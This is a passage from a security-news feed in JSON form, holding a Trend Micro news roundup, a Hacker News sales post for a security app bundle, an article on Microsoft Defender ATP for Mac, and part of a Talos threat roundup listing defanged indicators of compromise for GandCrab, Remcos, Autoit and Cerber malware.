processes could open their business up to specific vulnerabilities._** **\n\n[**Microsoft warns Windows 7 users of looming end to security updates**](<Microsoft%20warns%20Windows%207%20users%20of%20looming%20end%20to%20security%20updates>)\n\n_Microsoft has rolled out a patch that will warn Windows 7 users that security updates will come to an end on January 14, 2020. At that time, the software giant will no longer roll out fixes for security flaws and vulnerabilities._\n\n[**Attackers Targeting Cloud Infrastructure for Their Cryptocurrency-Mining Operations**](<https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/attackers-targeting-cloud-infrastructure-for-their-cryptocurrency-mining-operations>)\n\n_With the rise of cryptocurrency-mining malware over the past couple of years, cybercriminals are constantly trying different kinds of monetization schemes._** **\n\n[**Email Scammers Stole More Than $150K from Defense Contractors and a University, FBI Says**](<https://www.cyberscoop.com/email-scammers-stole-150k-defense-contractors-university-fbi-says/>)\n\n_Cybercriminals defrauded two defense contractors and a university out of more than $150,000 through email scams last year, the FBI has warned companies._\n\n[**Global Telecom Crime Undermining Internet Security: Cyber-Telecom Crime Report**](<https://www.trendmicro.com/vinfo/us/security/news/internet-of-things/global-telecom-crime-undermining-internet-security-cyber-telecom-crime-report>)\n\n_As the field of telecommunication continues to evolve, so should its security. Understanding its current threat landscape can help reduce the impact of crimes and prepare us for future threats._** **\n\n[**Half of Organizations Lack the Security Talent Needed to Remain Secure**](<https://www.itproportal.com/news/half-of-organisations-lack-the-security-talent-needed-to-remain-secure/>)\n\n_According to the latest Trend Micro figures, organizations worldwide are faced with an \u2018ongoing and often detrimental\u2019 shortage of cybersecurity talent._\n\n[**New Mirai Botnet Variant Targets IoT TV, Presentation Systems**](<https://www.trendmicro.com/vinfo/us/security/news/internet-of-things/new-mirai-botnet-variant-targets-iot-tv-presentation-systems>)\n\n_Trend Micro researchers found a new Mirai variant in the wild targeting smart signage TV and wireless presentation systems commonly used by businesses._** **\n\n[**Aluminum Maker Hydro Battles to Contain Ransomware Attack**](<https://www.reuters.com/article/us-norsk-hydro-cyber/hackers-hit-aluminum-maker-hydro-knock-some-plants-offline-idUSKCN1R00NJ>)\n\n_Norsk Hydro, one of the world\u2019s largest aluminum producers, battled to contain a cyber-attack that halted parts of its production._\n\n[**What You Need to Know About the LockerGoga Ransomware**](<https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/what-you-need-to-know-about-the-lockergoga-ransomware>)\n\n_The systems of Norwegian aluminum manufacturing company Norsk Hydro were reportedly struck last Tuesday, March 19, by LockerGoga ransomware._** **\n\n[**Round 4: Hacker Returns and Puts 26 Million User Records for Sale on the Dark Web**](<https://www.zdnet.com/article/round-4-hacker-returns-and-puts-26mil-user-records-for-sale-on-the-dark-web/>)\n\n_A hacker who previously put more than 840 million user records up for sale has returned with a fourth round of hacked data from six companies, totaling 26.42 million user records.__ _\n\n**[Trump\u2019s Cybersecurity Budget Emphasizes DOD While Spreading Cuts Elsewhere](<https://www.fedscoop.com/cybersecurity-budget-2020-trump-white-house/>)**\n\n_Federal cybersecurity spending would increase by about 5 percent overall in fiscal 2020 under President Donald Trump\u2019s proposed budget, with the Department of Defense getting a big boost and many civilian agencies seeing small cuts or relatively flat funding._\n\nAre you surprised with the growth and evolution of telecom technology? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: Radio Frequency Technology and Telecom Crimes](<https://blog.trendmicro.com/this-week-in-security-news-radio-frequency-technology-and-telecom-crimes/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-03-22T14:00:51", "published": "2019-03-22T14:00:51", "id": "TRENDMICROBLOG:68C239FCBFEAA39E48A9ADEC02C9CCB7", "href": "https://blog.trendmicro.com/this-week-in-security-news-radio-frequency-technology-and-telecom-crimes/", "type": "trendmicroblog", "title": "This Week in Security News: Radio Frequency Technology and Telecom Crimes", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2019-03-22T13:13:36", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-ta61Ik8NCl4/XJTASu1V0RI/AAAAAAAAzk4/6mmK_A6AW1ksZlkM1yMlO4Cg6Tdubb8YACLcBGAs/s728-e100/best-cybersecurity-software.png>)\n\nMajor data breaches and cyber attacks are occurring at an alarming rate, and if you are still not using a VPN and password manager app, you are seriously out of excuses. \n \nNot just VPN software and a password manager, cybersecurity experts also recommend using antivirus and backup solutions to protect your computers and precious data stored on them. Unfortunately, to cover these bases, one would typically have to spend at least $30 per month. \n \nHowever, here we have great news for millions of The Hacker News readers. \n\n\n \nCybersecurity companies partnered with [THN Deal Store](<https://deals.thehackernews.com/>) have exclusively launched a new subscription package called \u2014 **[The Vault](<https://deals.thehackernews.com/sales/digital-subscription-bundle?utm_source=thehackernews.com&utm_medium=referral&utm_campaign=digital-subscription-bundle&utm_term=scsf-321368&utm_content=a0x1P000003Yild&scsonar=1>)** \u2014 that slashes the price for top security apps everyone needs to use. \n \nAt just $9.99 monthly subscription, you can now get licenses for four award-winning cybersecurity apps: \n \n\n\n * [Dashlane Password Manager](<https://deals.thehackernews.com/sales/digital-subscription-bundle?utm_source=thehackernews.com&utm_medium=referral&utm_campaign=digital-subscription-bundle&utm_term=scsf-321368&utm_content=a0x1P000003Yild&scsonar=1>)\n * [Panda Antivirus Software](<https://deals.thehackernews.com/sales/digital-subscription-bundle?utm_source=thehackernews.com&utm_medium=referral&utm_campaign=digital-subscription-bundle&utm_term=scsf-321368&utm_content=a0x1P000003Yild&scsonar=1>)\n * [Degoo Online Backup](<https://deals.thehackernews.com/sales/digital-subscription-bundle?utm_source=thehackernews.com&utm_medium=referral&utm_campaign=digital-subscription-bundle&utm_term=scsf-321368&utm_content=a0x1P000003Yild&scsonar=1>) \u2014 2TB of Secure Cloud Storage \n * [NordVPN](<https://deals.thehackernews.com/sales/digital-subscription-bundle?utm_source=thehackernews.com&utm_medium=referral&utm_campaign=digital-subscription-bundle&utm_term=scsf-321368&utm_content=a0x1P000003Yild&scsonar=1>) \u2014 One of the best VPN service providers in 2019\n \n**Dashlane** \u2014 usual price: $4.99 per month \u2014 is one of the most popular and secure password manager software. It makes it easy for users to sync their usernames and passwords between their devices. \n \nDashlane stores users' data in a military-grade vault with two-factor security. Besides, Dashlane allows users to generate new secure passwords and fill checkout forms with just one click. \n \n**NordVPN** \u2014 usual price: $12.95 per month \u2014 is a highly-rated service that helps users stay secure online, with double 2048-bit encryption and a built-in kill switch. You can connect to 3,521 worldwide servers in 61 different countries, and the company keeps no logs, to preserve your privacy. \n \nWhether from accidental deletion, ransomware attack or hard drive failure, data loss occurs more often than you might think. \n \nSo, backing up your important data is always essential. Vault package also includes a 2TB of cloud storage from Degoo backup service provider that will keep your files secure. \n\n\n \n**Degoo **\u2014 usual price: $9.99 per month \u2013 is a the cloud storage platform that uses 256-bit AES encryption with automatic syncing and secure file sharing. \n \nFinally, **Panda Antivirus** \u2014 usual price: $4.99 per month \u2014 helps avoid both malware and online fraud. Available on Windows, Mac, and Android, Panda uses artificial intelligence to detect threats. \n \nThat means it can block even brand new malware. The service also provides parental controls and can help locate missing devices. \n \nAll these subscription-based cybersecurity apps would typically cost you around $31.92 per month if purchased separately from their official websites. \n \nHowever, with Vault, you can [get all four cybersecurity apps](<https://deals.thehackernews.com/sales/digital-subscription-bundle?utm_source=thehackernews.com&utm_medium=referral&utm_campaign=digital-subscription-bundle&utm_term=scsf-321368&utm_content=a0x1P000003Yild&scsonar=1>) for just $9.99 per month \u2014 that's a saving of about $264 per year. \n \nOrder now to get an instant security upgrade. Stay hidden. Stay secure. Stay safe. Stay prepared.\n", "modified": "2019-03-22T11:57:30", "published": "2019-03-22T11:57:00", "id": "THN:6572DDE4A44A66187EF6349FFF717841", "href": "https://thehackernews.com/2019/03/best-cybersecurity-software.html", "type": "thn", "title": "Get 4 Essential CyberSecurity Software For Less Than $10 Per Month", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-03-22T09:11:15", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-hOIqONker2Q/XJSOfxuHBDI/AAAAAAAAzks/qcNah51ncIQBYUujAO5tzCUachnkF_hRQCLcBGAs/s728-e100/microsoft-windows-defender-antivirus-for-macos.jpg>)\n\nBrace yourself guys. \n \nMicrosoft is going to release its Windows Defender ATP antivirus software for Mac computers. \n \nSounds crazy, right? But it's true. \n \nMicrosoft Thursday announced that the company is bringing its anti-malware software to Apple\u2019s macOS operating system as well\u2014and to more platforms soon, like Linux. \n \nAs a result, the technology giant renamed its Windows Defender Advanced Threat Protection (ATP) to Microsoft Defender Advanced Threat Protection (ATP) in an attempt to minimize name-confusion and reflect the cross-platform nature of the software suite. \n\n\n \nBut wait, does your Macbook need antivirus protection? Of course! \n \nFor all those wondering if Mac even gets viruses\u2014macOS is generally more secure than Windows, but in recent years cybercriminals have started paying attention to the Mac platform, making it a new target for viruses, Trojans, spyware, adware, ransomware, backdoors, and other nefarious applications. \n \nMoreover, hackers have been successful many times. Remember the dangerous [FruitFly malware](<https://thehackernews.com/2017/07/macos-malware-fruitfly.html>) that infected thousands of Mac computers, the recently discovered cryptocurrency-stealing malware [CookieMiner](<https://thehackernews.com/2019/02/mac-malware-cryptocurrency.html>) and DarthMiner, and [.EXE malware](<https://thehackernews.com/2019/02/macos-windows-exe-malware.html>) discovered last month? \n \n\n\n## Microsoft Defender ATP Antivirus for Mac\n\n \nMicrosoft has now come up with a dedicated Defender ATP client for Mac, offering full anti-virus and threat protection with the ability to perform full, quick, and custom scans, giving macOS users \"next-generation protection and endpoint detection and response coverage\" as its Windows counterpart. \n \n\n\n> \"We've been working closely with industry partners to enable Windows Defender Advanced Threat Protection (ATP) customers to protect their non-Windows devices while keeping a centralized \u201csingle pane of glass\u201d experience,\" Microsoft says in a [blog post](<https://techcommunity.microsoft.com/t5/Windows-Defender-ATP/Announcing-Microsoft-Defender-ATP-for-Mac/ba-p/378010>).\n\n \nMicrosoft also promised to add Endpoint Detection and Response, and Defender ATP's new Threat and Vulnerability Management (TVM) capabilities in public preview next month. \n\n\n \nTVM uses a risk-based approach to help security teams discovery, prioritize, and remediate known vulnerabilities and misconfigurations using a mixture of real-time insights, added context during incident investigations and built-in remediation processes through Microsoft's Intune and System Center Configuration Manager. \n \nFor now, the tech giant has released Microsoft Defender ATP for Mac (compatible with macOS Mojave, macOS High Sierra, or macOS Sierra) in limited preview for businesses that have both Windows and Mac computer systems. \n\n\nLike MS Office for Mac, Defender for Mac will also use Microsoft AutoUpdate software to get the latest features and fixes on time. \n \nWhile Microsoft has announced its plans to launch Defender ATP for more platforms in the future, the company has not explicitly named those platforms. \n \nAlso, it is not clear if Microsoft is also planning to launch a consumer version of Microsoft Defender for Mac users in the future. \n \nMicrosoft's business customers can [sign up here](<https://www.microsoft.com/en-us/wdsi/support/macpreviewsignup>) for the limited preview. \n \nIn the attempt to make its security software available to more people, Microsoft just last week [released](<https://blogs.windows.com/windowsexperience/2019/03/15/announcing-windows-10-insider-preview-build-18358/#PsK0BO95cqy8SD56.97>) Windows Defender extensions for Mozilla Firefox and Google Chrome as well. \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "modified": "2019-03-22T07:55:57", "published": "2019-03-22T07:53:00", "id": "THN:055852496C8DE209E048F08F5A98FD0B", "href": "https://thehackernews.com/2019/03/microsoft-defender-antivirus-macos.html", "type": "thn", "title": "Microsoft Announces Windows Defender ATP Antivirus for Mac", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2019-03-22T19:14:00", "bulletinFamily": "blog", "description": "[](<https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABQ/MjxDRHMcG884MPWC8_VvkkBYeFaz38pogCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\n \n\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between March 15 and March 22. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5c951cb114676.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \n \nThe most prevalent threats highlighted in this roundup are: \n \n\n\n * **Win.Ransomware.Gandcrab-6900355-0** \nRansomware \nGandCrab is ransomware that encrypts documents, photos, databases and other important files using the file extension \".GDCB\", \".CRAB\" or \".KRAB\". GandCrab is spread through both traditional spam campaigns, as well as multiple exploit kits, including Rig and GrandSoft. \n \n * **Win.Trojan.Remcos-6898089-0** \nTrojan \nRemcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. Remcos is commonly delivered through Microsoft Office Documents with macros, sent as attachments on malicious emails. \n \n * **Win.Malware.Autoit-6897734-0** \nMalware \nAutoit is a malware family leveraging the well-known AutoIT automation tool, widely used by system administrators. AutoIT exposes a rich scripting language that allows to write fully functional malicious software. This family will install itself on the system and contact a C2 server to receive additional instructions. \n \n * **Win.Ransomware.Cerber-6896901-0** \nRansomware \nCerber is ransomware that encrypts documents, photos, databases and other important files using the file extension \".cerber.\" \n \n * **Win.Malware.Zbot-6896522-0** \nMalware \nZbot, also known as Zeus, is trojan that steals information such as banking credentials using a variety of methods, including key-logging and form-grabbing. \n \n * **Win.Malware.Ursnif-6896385-0** \nMalware \nUrsnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits. \n \n * **Win.Packed.Kovter-6895460-0** \nPacked \nKovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries that store its malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware. \n \n * **Win.Malware.Upatre-6894504-0** \nMalware \nUpatre is a trojan that is often delivered through spam emails with malicious attachments or links. It is known to be a downloader and installer for other malware. \n \n * **Doc.Downloader.Emotet-6894115-0** \nDownloader \nEmotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \n \n * **Win.Trojan.NetWire-6893426-1** \nTrojan \nNetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \n \n\n* * *\n\n## Threats\n\n### Win.Ransomware.Gandcrab-6900355-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * <HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \n * Value Name: xbnykvblxlz\n**Mutexes** \n\n\n * N/A\n**IP Addresses** contacted by malware. Does not indicate maliciousness \n\n\n * 66[.]171[.]248[.]178\n**Domain Names** contacted by malware. Does not indicate maliciousness \n\n\n * carder[.]bit\n * ransomware[.]bit\n * ns2[.]wowservers[.]ru\n**Files and or directories created** \n\n\n * %AppData%\\Microsoft\\jfwwxp.exe\n**File Hashes** \n\n\n * 19b5f589a31dd4b6fd6fcda9e529f04adee6628740cfb4354b7fde94ca4c8fe8\n * 2870e29273fac8161c571505e2081afe0aa8c9e198150923f9efcb15a0379e66\n * 31bbc9f6a7d5b5c248c6379afcf7c7026fb0f3b521016d918edba1fad085a9cc\n * 3e9ae9bb1061f2335cbca35ddfe71f7b93d8ff14a79c362b7a5e22a3c19f5af0\n * 3f18aeab0f40e3f957807fdb6142cafcfd4faeac39b0f31df9e869cca981cb70\n * 5a6f4af9f4c0230111b39ff7cf127db182738ed735fa72183f935f272491b53d\n * 635cd9d2065acf51745629ff92e41c8b331d25376868cfde5ec3dfab91cd0026\n * 961b6caacf88d67139309a5dbec806301a1e7fc8eec7db166d9d0d0120346cad\n * a8d145d01780227cecb322d69d173248c122c5c5b5ffe74c28e1ef89958b4dd7\n * c4e78e775a53a51eefc2b5dd4ce161bd1794119a02481e03b9917aba5279d9c0\n * cfb324eb0b95048aa3248b4475902e575da996b63ff86cf78211424ec8c1c561\n * e43d30708069f2ec0b0237144b23e2d337521174530caefd04728fcc0cbbfd6e\n * fcefe7d20db180411dd0f1ae2749e622738d9b8e6cca09a01b870551823ccbd3\n \n\n\n#### Coverage\n\n[](<https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n \n\n\n[](<https://4.bp.blogspot.com/-_0pWN9cI1TQ/XJUdpGU1fKI/AAAAAAAABmc/KI9yOPX8Dmcs0P1D15dKN6bhPri3eoT6wCLcBGAs/s1600/31bbc9f6a7d5b5c248c6379afcf7c7026fb0f3b521016d918edba1fad085a9cc_amp.png>)\n\n \n \n**ThreatGrid** \n** \n** \n\n\n[](<https://4.bp.blogspot.com/-7lhWOs1FoBk/XJUds-4g96I/AAAAAAAABmg/yXEqTSs5vbsdqL86P0SxrvHwkidqCH29gCLcBGAs/s1600/31bbc9f6a7d5b5c248c6379afcf7c7026fb0f3b521016d918edba1fad085a9cc_tg.png>)\n\n** \n** \n**Umbrella** \n** \n** \n\n\n[](<https://3.bp.blogspot.com/-m4pteRIhRf4/XJUd3JS-wXI/AAAAAAAABmk/XeaZ0XkXg4MMbgZdPyfrSWMWYVM9K8S4gCLcBGAs/s1600/31bbc9f6a7d5b5c248c6379afcf7c7026fb0f3b521016d918edba1fad085a9cc_umbrella.png>)\n\n** \n** \n\n\n### Win.Trojan.Remcos-6898089-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * <HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \n * Value Name: internat.exe\n * <HKCU>\\SOFTWARE\\IYFIZFIFK-HKLTVU \n * Value Name: exepath\n * <HKCU>\\SOFTWARE\\IYFIZFIFK-HKLTVU \n * Value Name: licence\n * <HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \n * Value Name: Wordpads\n**Mutexes** \n\n\n * Remcos_Mutex_Inj\n * iyfizfifk-HKLTVU\n**IP Addresses** contacted by malware. Does not indicate maliciousness \n\n\n * 194[.]5[.]98[.]147\n * 103[.]200[.]5[.]128\n**Domain Names** contacted by malware. Does not indicate maliciousness \n\n\n * N/A\n**Files and or directories created** \n\n\n * %LocalAppData%\\Temp\\install.vbs\n * %TEMP%\\pyrogenetic.exe\n * %TEMP%\\pyrogenetic.vbs\n * %ProgramFiles%\\Wordpads\\Wordpads.exe\n**File Hashes** \n\n\n * 0a1d151c7170baace5e771feb217ee3a685f8af2ddf5c51571d321b2253fa48a\n * 2b6ea3f861899440039f30018f2593a3202b27e3a7f7adec5d5a3703dce3ed59\n * 2c125850f874973b605b04f2ca76d4ae3476bd495890a55f1be3d74de4ca5015\n * 2ea12c4cf9c0c9a3926e0f77333a5e74faf1f4956ab4a599bfd1be6410a4a348\n * 34ce4dbec1155384abd4eab34fa0bc7ca1ead6ae2c4be9a54299e051100245fa\n * 55f209afba93e7a881ad14761b1349349548843a388af32e084a58fe51bc1d34\n * 616ece9b51f1fead02cbc893af7f76240a84a39a9096b4d6cdb066b6ad8a7f4d\n * 786fd0f58b0731ae1326c434ff77bb3f40405dc0fd9f2814d8b41265325920de\n * b76d7be62eb4b198c540220e8b697e01fa80e42465ba314992002175b6593bae\n * bdeea19cc4255537c110faa58fb74721e6503d8815cc62b0fe14a77eba0c4bef\n * c4d675f3f5941b6488fc4c3ecf540c106ef21aa8b8be858cd9ed750888947032\n * c5d8569dbe75f1725774befcd82f1f0cabd8baf07759d60f9b2691870954408f\n * d414046e1fa2ab58f5cb5ea84db538bec4ccff435a7d7c2aab826ebfd584a518\n * dcedf388c083bb55821749ed00e80c96e2aef01fe0e1a26bfdba8b9b8b3d1556\n * e6d04db2794d86b03d8deb2d8c902f76dda946240dc8fbc82d7509c722fa571a\n * e8649923e071a79f7810eddb32257d5782e39428da217cd5aa34af4c821cb0f6\n * fa73eb7829ef969e79d43f647136bdcac25a9b3739961b0653e7bab640966f12\n \n\n\n#### Coverage\n\n[](<https://4.bp.blogspot.com/-1hMhIqEn4Es/Wz-6jETR80I/AAAAAAAAAc8/E5qJe2ICdUc2dhS89EAzcTks1OiNvkVhgCLcBGAs/s320/no-umbrella-cloudlock.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n \n\n\n[](<https://1.bp.blogspot.com/-dNozLUZ0u00/XJUeEFB4LPI/AAAAAAAABmw/RypsBZZLg6MoFxbNFebtKF8h5xloFIqoACLcBGAs/s1600/e6d04db2794d86b03d8deb2d8c902f76dda946240dc8fbc82d7509c722fa571a_amp.png>)\n\n \n \n**ThreatGrid** \n \n\n\n[](<https://4.bp.blogspot.com/-zKciYrItz3k/XJUeIDi1cRI/AAAAAAAABm0/jrc6nByBAhkT44R1ulbfMFgdMKEK0Z5EgCLcBGAs/s1600/e6d04db2794d86b03d8deb2d8c902f76dda946240dc8fbc82d7509c722fa571a_tg.png>)\n\n \n \n\n\n### Win.Malware.Autoit-6897734-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * N/A\n**Mutexes** \n\n\n * altspace\n**IP Addresses** contacted by malware. Does not indicate maliciousness \n\n\n * N/A\n**Domain Names** contacted by malware. Does not indicate maliciousness \n\n\n * charlesprofile[.]website\n**Files and or directories created** \n\n\n * %UserProfile%\\archiveint\\adalsql.exe\n * %System32%\\Tasks\\Gfxv4_0\n**File Hashes** \n\n\n * 0df27d70990f8b8ec8b3df25cf1eb9666bf92526095da227080a0372c60aa588\n * 287d43060fcca28466206776b5a147e83d3fd7de4230f1cd909953daa12d0156\n * 43e9ecb0c189695bbb533ec47746edf76778aa1a8b0266f5ac267f79f5cef03d\n * 4634ecfa0699f7408c84fc3c2cdb42601d372777237eec1fe0a58868ef693c1a\n * 5721c80fb52b4db900819b1738db0ad82c502eb7d79e152edb9f2e371f3c9664\n * 6635eb7fc5c7c454b6c5c19018820e249318c34305420cf27392c171df491635\n * 6b327d6a88a18c1167637a8878bf441cfcf567e9c1e19a95c27b93c16e69b45e\n * 7642637e654417d9add1a62ac596cb8d1d84f793749e9e4cc92a117e33d56133\n * 87d5cafaf2e1bb5f56caa5aebd24fbf9941db0e079ba854fb9aaf3bce4c819b2\n * 93cfe8d255a490ac9f173ceb7618a019a25b9246b87e0493acaa20dda799950c\n * d8c4ea9786f6ddc62da7b3555b3efb138ca0c4a0348be83ecec060618db2c276\n * e4503c499e82fa0bce07fd10fdcf132d4a0933d309973b94823366d97a05c4e6\n * e48da123e2e08dd9f62abb56e630b8edfe4ea7977149bda53522bebacfb10d00\n * f51011fa1fbfdf0be75a9300931d33b850b601a01d1a4bfab33c346e3fdde5f2\n * f5bbc3ec89ae91eb6a25cbdb66c4a95b1756298815a50a9e0ce2f27ba57a878f\n * f95c285f6632fecd805fab3e79d018ab4e34e2c230adac317a94ca55b15fd35b\n \n\n\n#### Coverage\n\n[](<https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n \n\n\n[](<https://2.bp.blogspot.com/-H3pQRPXERpE/XJUeXY1aUgI/AAAAAAAABm8/Sn_XUfTaq_AelRWbWqLIRsmptK0CGMuRgCLcBGAs/s1600/6b327d6a88a18c1167637a8878bf441cfcf567e9c1e19a95c27b93c16e69b45e_amp.png>)\n\n \n \n**ThreatGrid** \n \n\n\n[](<https://3.bp.blogspot.com/-3uxB1eTJvpk/XJUedEYkkJI/AAAAAAAABnE/Hs5qdIAtrMoD9GVVCsMKTfD2_GIK_gK7ACLcBGAs/s1600/6b327d6a88a18c1167637a8878bf441cfcf567e9c1e19a95c27b93c16e69b45e_tg.png>)\n\n \n \n**Umbrella** \n \n\n\n[](<https://3.bp.blogspot.com/-EEBhgvVgTtQ/XJUei2iV2FI/AAAAAAAABnI/u74d6nMDrRMoFl3FrWxVQxZI9tYlFhgzACLcBGAs/s1600/6b327d6a88a18c1167637a8878bf441cfcf567e9c1e19a95c27b93c16e69b45e_umbrella.png>)\n\n \n \n\n\n### Win.Ransomware.Cerber-6896901-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * <HKCU>\\CONTROL PANEL\\DESKTOP \n * Value Name: SCRNSAVE.EXE\n**Mutexes** \n\n\n * shell.{381828AA-8B28-3374-1B67-35680555C5EF}\n**IP Addresses** contacted by malware. Does not indicate maliciousness \n\n\n * N/A\n**Domain Names** contacted by malware. Does not indicate maliciousness \n\n\n * cerberhhyed5frqa[.]vmfu48[.]win\n**Files and or directories created** \n\n\n * %SystemDrive%\\Documents and Settings\\All Users\\\\# DECRYPT MY FILES #.html\n * %SystemDrive%\\Documents and Settings\\All Users\\\\# DECRYPT MY FILES #.txt\n * %SystemDrive%\\Documents and Settings\\All Users\\\\# DECRYPT MY FILES #.url\n * %SystemDrive%\\Documents and Settings\\All Users\\\\# DECRYPT MY FILES #.vbs\n * %AppData%\\Microsoft\\Internet Explorer\\apXmmhm1Ka.cerber (copy)\n * %AllUsersProfile%\\Microsoft\\Dr Watson\\tMYvM36CEP.cerber (copy)\n**File Hashes** \n\n\n * 001b33940ee8465748b743f0df809eae3a2a08a78af15243312584cce53393c1\n * 01906006204a9a84fd0dd7d061aacbb093d09a8192c65cc55e3be6edd164c908\n * 02f66c7648b064b49da5218664d1f5abbe954c6a02f46db9dac77358a0d9b92f\n * 0830faf3346becd79a49df77f0d181c66bed86d1771622f0b8315e288ba29e77\n * 0affee8e0b6dce3ec8c453b6a7ac92648bea9006a63c77b7efd36537adabf5b4\n * 0d899afe8df44ba83ee7b02f621100ed721dd0bd9411d6d0a6e3935baa65cc0f\n * 0df1130e9f23b007643dd0ed3375528cb08d0496b195401078fbd27d2fa5de10\n * 0f3c4c70da6c8a58c0f6844eabc40773e0622f8a1e3f13370538112634ae0079\n * 127d0879d93ff4fb65ff40d723480e62e0144483f4be7da0a739ceae9c446d3f\n * 133a9faa5bd0bd157660e67bf208cdea7cde346836df7ed3f0619edf9e652313\n * 1ab65651d3c70301f55f31fa294e215b1c72e9aa7f87d894e493b5e25d2d35d2\n * 1ad4afdcb9a62b69473149a0e70c38822be0f566b6759922f730c074bffcd09c\n * 1cd3e3a997e017a9ad7883dbee9ba8c71f416e56e1113c96d13290dd998ad8da\n * 1df2e8bb31a42361b916a71aa2e816dcc7279b93a80b2613d5dd8681f007cec1\n * 20e0fc147c170e25c8ba1dbb4e6d0dcafa6771659ba101b67e5b2176d41fb81e\n * 2232654770e8440f3d4629753cc78bcc97b054c5df003ac3908da5b20d058659\n * 2b5295639ab89940a16a9b7dc80f7eefbe065fd0bcbdb7d1c783cebd93dd9db8\n * 2dae95760c360eadeba55f370e3e78e9761f436539ffc3cc1e8e91395722ab4b\n * 2e87382ab956e8db123f80f8ecffeb61c4461b5c77d6deed2952c68b9a96f3d8\n * 2ffc4d2116734e50078268c07b7b972d9d127e9d83513d331d13788c7c941990\n * 31235847a5b061a60d79ad9f634455bfc95ce68667ec4df1fc479d147c794649\n * 320281163724c2d356f3ba9e7ccab33fa06b584f841dcbed783cb65432f1498c\n * 3374ca6683d9bb5434fa192eebe615ba6a609cbd8063c47eca42c47bb480e886\n * 3444fa109868538f1b25a0b4e1e8b1b8545ae88e0dc4a71161e64a868826d301\n * 369dc38935f947829cfa4c85e8262a594ef9bd1ece3479c980d90e62ebfeea68\n \n\n\n#### Coverage\n\n[](<https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n** \n** \n\n\n[](<https://2.bp.blogspot.com/-wMpNpAz9p8k/XJUff85yx6I/AAAAAAAABnY/R43ckkdgJccqw2rs3gaza4vewjTTEIo5gCLcBGAs/s1600/001b33940ee8465748b743f0df809eae3a2a08a78af15243312584cce53393c1_amp.png>)\n\n** \n** \n**Umbrella** \n \n\n\n[](<https://2.bp.blogspot.com/-zOP6oigXJbw/XJUfjWDPy5I/AAAAAAAABnc/QFGBXXpxzeobkYEpapKsg4Oha9ejgEa7QCLcBGAs/s1600/001b33940ee8465748b743f0df809eae3a2a08a78af15243312584cce53393c1_umbrella.png>)\n\n \n \n**Malware** \n \n\n\n[](<https://1.bp.blogspot.com/-xHLAflW8_y8/XJUfm_LB4PI/AAAAAAAABng/diIvsS006GkjWdQxlCucA5WaH35J82D8wCLcBGAs/s1600/001b33940ee8465748b743f0df809eae3a2a08a78af15243312584cce53393c1_malware.png>)\n\n 